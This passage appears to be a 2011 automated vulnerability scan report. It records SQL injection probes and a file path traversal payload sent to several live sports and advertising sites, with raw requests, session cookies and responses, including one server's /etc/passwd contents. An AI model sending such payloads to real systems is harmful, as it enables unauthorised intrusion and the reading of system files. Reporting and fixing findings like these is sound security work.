Via: HTTP/1.1 r2.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3520


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+39+and+1+2+news+slug+aw'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.rd.yahoo.c
...[SNIP]...

1.5. http://sports.yahoo.com/nba/news [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://sports.yahoo.com
Path:   /nba/news

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19672091'%20or%201%3d1--%20 and 19672091'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /nba/news19672091'%20or%201%3d1--%20?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 1

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r3.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3537


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+news19672091+39+or+1+slug+aw+wojnarowski'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.
...[SNIP]...

Request 2

GET /nba/news19672091'%20or%201%3d2--%20?slug=aw-wojnarowski_nowitzki_mavericks_win_nba_finals_061311 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=edn6q5d6t078b&b=3&s=vv; CH=AgBN5uYQADlWEAA1WxAALXwQAC0hEAAhWRAAM70QADEpEAA6vhAABx4QABKh

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 13 Jun 2011 11:07:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Age: 0
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.a2s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 3527


<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo!</title><style>
<script type="text/javascript">
document.location = 'http://search.yahoo.com/404handler?src=sports&fr=404_sports&ref=&url=Yahoo!+Sports+nba+news19672091+39+or+1+2+slug+aw'
</script>/* nn4 hide */
/*/*/
body {font:small/1.2em arial,helvetica,clean,sans-serif;font:x-small;text-align:center;}table {font-size:inherit;font:x-small;}
html>body {font:83%/1.2em arial,helvetica,clean,sans-serif;}input {font-size:100%;vertical-align:middle;}p, form {margin:0;padding:0;}
p {padding-bottom:6px;margin-bottom:10px;}#doc {width:48.5em;margin:0 auto;border:1px solid #fff;text-align:center;}#ygma {text-align:right;margin-bottom:53px}
#ygma img {float:left;}#ygma div {border-bottom:1px solid #ccc;padding-bottom:8px;margin-left:152px;}#bd {clear:both;text-align:left;width:75%;margin:0 auto 20px;}
h1 {font-size:135%;text-align:center;margin:0 0 15px;}legend {display:none;}fieldset {border:0 solid #fff;padding:.8em 0 .8em 4.5em;}
form {position:relative;background:#eee;margin-bottom:15px;border:1px solid #ccc;border-width:1px 0;}
#s1p {width:15em;margin-right:.1em;}
form span {position:absolute;left:70%;top:.8em;}form a {font:78%/1.2em arial;display:block;padding-left:.8em;white-space:nowrap;background: url(http://l.yimg.com/a/i/s/bullet.gif) no-repeat left center;}
form .sep {display:none;}.more {text-align:center;}#ft {padding-top:10px;border-top:1px solid #999;}#ft p {text-align:center;font:78% arial;}
/* end nn4 hide */
</style></head>
<body><div id="doc">
<div id="ygma"><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com"><img src=http://l.yimg.com/a/i/yahoo.gif width=147 height=31 border=0 alt="Yahoo!"></a><div><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo!</a> - <a href="http://us.rd.yahoo.com/default/*http://help.yahoo.com">Help</a></div></div>
<div id="bd"><h1>Sorry, the page you requested was not found.</h1>
<p>Please check the URL for proper spelling and capitalization. If you're having trouble locating a destination on Yahoo!, try visiting the <strong><a href="http://us.rd.yahoo.com/default/*http://www.yahoo.com">Yahoo! home page</a></strong> or look through a list of <strong><a href="http://us.rd.yahoo.c
...[SNIP]...

1.6. http://www.lijit.com/beacon [informer parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lijit.com
Path:   /beacon

Issue detail

The informer parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the informer parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /beacon?viewId=1307962923471503c3265a8b0&rand=1307962923471&uri=http://www.lijit.com/users/sbnation&informer=7182163%20and%201%3d1--%20&type=fpads&loc=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&rr=&ifr=0&v=1.0&csync=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_csync=dotomi%2Crtb_turn%2C1; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE

Response 1

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:15:18 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n23 ( iad-agg-n7), ms iad-agg-n7 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 13 Jun 2011 11:15:18 GMT
Content-Length: 69
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: tpro_inst=bc491fffd0d2d852ccd68e7be9624b6b; expires=Tue, 12-Jun-2012 11:15:18 GMT; path=/; domain=.lijit.com
Set-Cookie: tpro=eJxlUV1vhCAQ%2FC%2F7TAyIH6d%2Fo49NQyiikiAY0Esuxv%2FeBdO7a%2Fo2s84OM%2BsBa%2FCjsRr6AybtBh0SWmSa0KKtCYz6l5X1SUBOWcsFK3FGgCFqL3QTvEo6zgjwWlRdInVFoKZitXtMlCWPIFU2UXJX0KNajkHIJbvIaKTLaDZxzcBvc4pFcVPNxg5Bu7TtfDLsGgIPnb1phQrjlF%2ByOxWc5jGW4FQ0mXAkDRWMXqzF2PSVruTpDW%2Btvlo673Lzir%2BNsROaTEEOIqo5v1CeuBfNlnJ8HhlBDx%2BrD1sE7LRhS07brim7sjnJUzFKF82ghwIz%2F9HxpmZvukXe44JZHt%2FS2v%2Filt3Or%2Bed8PdtJp3g9ZXA4geh%2FO5wCbvcdYjG4xWBFRTO8wer25Ny; expires=Tue, 12-Jun-2012 11:15:18 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; expires=Wed, 12-Jun-2013 11:15:18 GMT; path=/; domain=.lijit.com

<html>
   <head><title></title></head>
   <body>
           </body>
</html>

Request 2

GET /beacon?viewId=1307962923471503c3265a8b0&rand=1307962923471&uri=http://www.lijit.com/users/sbnation&informer=7182163%20and%201%3d2--%20&type=fpads&loc=http%3A%2F%2Fwww.mavsmoneyball.com%2F2011%2F6%2F12%2F2220848%2Fnba-finals-2011-dallas-mavericks-win-their-first-ever-championship&rr=&ifr=0&v=1.0&csync=1 HTTP/1.1
Host: www.lijit.com
Proxy-Connection: keep-alive
Referer: http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_csync=dotomi%2Crtb_turn%2C1; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE

Response 2

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:15:19 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n23 ( iad-agg-n18), ms iad-agg-n18 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, max-age=0
Pragma: no-cache
Expires: Mon, 13 Jun 2011 11:15:19 GMT
Content-Length: 69
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: tpro_inst=deleted; expires=Sun, 13-Jun-2010 11:15:18 GMT; path=/; domain=.lijit.com
Set-Cookie: ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; expires=Wed, 12-Jun-2013 11:15:19 GMT; path=/; domain=.lijit.com

<html>
   <head><title></title></head>
   <body>
           </body>
</html>

1.7. http://www.mavsmoneyball.com/2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mavsmoneyball.com
Path:   /2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship HTTP/1.1
Host: www.mavsmoneyball.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:07:49 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Mon, 13 Jun 2011 11:06:10 GMT
ETag: "5e0038-1efa84-4a595e82904b4"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2030212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&amp;rand=15974520"></script>



<link href="http://cdn0.sbnation.com/stylesheets/universal_screen.v5273bb74a0e39148.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/community_new_all.v75f885872ba0b098.css" media="all" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/blogs/blog-print.v777cf8a.css" media="print" rel="stylesheet" type="text/css" />

<!--[if lte IE 7]>
<link href="http://cdn2.sbnation.com/stylesheets/shared/ie7-hacks.vb7d711f.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn2.sbnation.com/stylesheets/blogs/ie-hacks.v777cf8a.css" media="screen" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if lte IE 6]>
<link href="http://cdn2.sbnation.com/stylesheets/shared/ie6-hacks.vd00358f937b0dfe1.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn1.sbnation.com/stylesheets/blogs/ie6-hacks.v9e2ba1ec05749cdf.css" media="screen" rel="stylesheet" type="text/css" />
<![endif]-->



<style type="text/css"><!-- body{background-image:url(http://cdn1.sbnation.com/community_logos/28080/top_fade_base.png);}.ut-logged-out ul li.start a{background-image:url(http://cdn1.sbnation.com/community_logos/1814/mavs-fave.gif);}.nav-head li a:hover{background-color:#046AB4;}.social-promo{border-color:#046AB4;}.container{background-color:#061922;}.pane h3,.entries h3.subtitle{background-color:#046AB4;border-color:#046AB4;}.nav-head-div{background-color:#023672;}.gcolumns .col-side #thumbs a:hover img{border-color:#285487;}.col-side .sports_data_widget .pane-tabs li{background-color:#2A80BF;}.events,#modal_container .sports_data_widget,.col-side .sports_data_widget,.col-side .sports_data_widget .pane-tabs li a.active,.col-side .sports_data_widget .pane-tabs li a.active:visited,.col-side .sports_data_widget .pane-tabs li a.active:hover,.col-side .sports_data_widget .pane-tabs li a.active:active{background-colo
...[SNIP]...

Request 2

GET /2011/6/12/2220848/nba-finals-2011-dallas-mavericks-win-their-first-ever-championship HTTP/1.1
Host: www.mavsmoneyball.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:07:50 GMT
Server: Apache
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa CONi OUR IND PHY ONL UNI COM NAV INT CNT STA"
Cache-Control: private, max-age=0, must-revalidate
Last-Modified: Mon, 13 Jun 2011 11:02:12 GMT
ETag: "780110-1efa7a-4a595d9fa8b2a"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 2030202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-eq
...[SNIP]...
<script type="text/javascript" src="http://www.sbnation.com/sso/initiate_auto_login?community_id=38&amp;rand=61256780"></script>



<link href="http://cdn0.sbnation.com/stylesheets/universal_screen.v5273bb74a0e39148.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/community_new_all.v75f885872ba0b098.css" media="all" rel="stylesheet" type="text/css" />
<link href="http://cdn3.sbnation.com/stylesheets/blogs/blog-print.v777cf8a.css" media="print" rel="stylesheet" type="text/css" />

<!--[if lte IE 7]>
<link href="http://cdn2.sbnation.com/stylesheets/shared/ie7-hacks.vb7d711f.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn2.sbnation.com/stylesheets/blogs/ie-hacks.v777cf8a.css" media="screen" rel="stylesheet" type="text/css" />
<![endif]-->

<!--[if lte IE 6]>
<link href="http://cdn2.sbnation.com/stylesheets/shared/ie6-hacks.vd00358f937b0dfe1.css" media="screen" rel="stylesheet" type="text/css" />
<link href="http://cdn1.sbnation.com/stylesheets/blogs/ie6-hacks.v9e2ba1ec05749cdf.css" media="screen" rel="stylesheet" type="text/css" />
<![endif]-->



<style type="text/css"><!-- body{background-image:url(http://cdn1.sbnation.com/community_logos/28080/top_fade_base.png);}.ut-logged-out ul li.start a{background-image:url(http://cdn1.sbnation.com/community_logos/1814/mavs-fave.gif);}.nav-head li a:hover{background-color:#046AB4;}.social-promo{border-color:#046AB4;}.container{background-color:#061922;}.pane h3,.entries h3.subtitle{background-color:#046AB4;border-color:#046AB4;}.nav-head-div{background-color:#023672;}.gcolumns .col-side #thumbs a:hover img{border-color:#285487;}.col-side .sports_data_widget .pane-tabs li{background-color:#2A80BF;}.events,#modal_container .sports_data_widget,.col-side .sports_data_widget,.col-side .sports_data_widget .pane-tabs li a.active,.col-side .sports_data_widget .pane-tabs li a.active:visited,.col-side .sports_data_widget .pane-tabs li a.active:hover,.col-side .sports_data_widget .pane-tabs li a.active:active{background-colo
...[SNIP]...

1.8. http://www.twackle.com/fansided/General_Twackle_Widget [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.twackle.com
Path:   /fansided/General_Twackle_Widget

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /fansided'/General_Twackle_Widget HTTP/1.1
Host: www.twackle.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Age: 0
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 13 Jun 2011 11:17:33 GMT
P3P: CP="CAO PSA OUR"
Server: nginx/1.0.2 + Phusion Passenger 3.0.7 (mod_rails/mod_rack)
Status: 500
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.7
X-Varnish: 1493755781
Content-Length: 1735
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en-US">
<head>
<meta h
...[SNIP]...

Request 2

GET /fansided''/General_Twackle_Widget HTTP/1.1
Host: www.twackle.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Age: 0
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Mon, 13 Jun 2011 11:17:34 GMT
ETag: "d82f7b24bfcc87abc64d202c70fedce5"
P3P: CP="CAO PSA OUR"
Server: nginx/1.0.2 + Phusion Passenger 3.0.7 (mod_rails/mod_rack)
Status: 200
Vary: Accept-Encoding
Via: 1.1 varnish
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.7
X-Runtime: 16
X-Varnish: 1493755835
Content-Length: 42
Connection: keep-alive

Sorry but this page doesn't exist anymore.

2. File path traversal

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.glam.com
Path:   /app/site/affiliate/viewChannelModule.act

Issue detail

The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload viewAdJs../../../../../../../../etc/passwd%00viewAdJs was submitted in the mName parameter. The requested file was returned in the application's response.

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, or by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwd%00viewAdJs&affiliateId=1000212071&adSize=300x250 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: glam_sid=115232130551023312111; ctags=%3bct%3dpacsun%3bct%3dxboxk3905

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=3600
Date: Mon, 13 Jun 2011 11:09:34 GMT
Content-Length: 2011
Connection: close

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwa
...[SNIP]...

3. HTTP header injection
There are 9 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

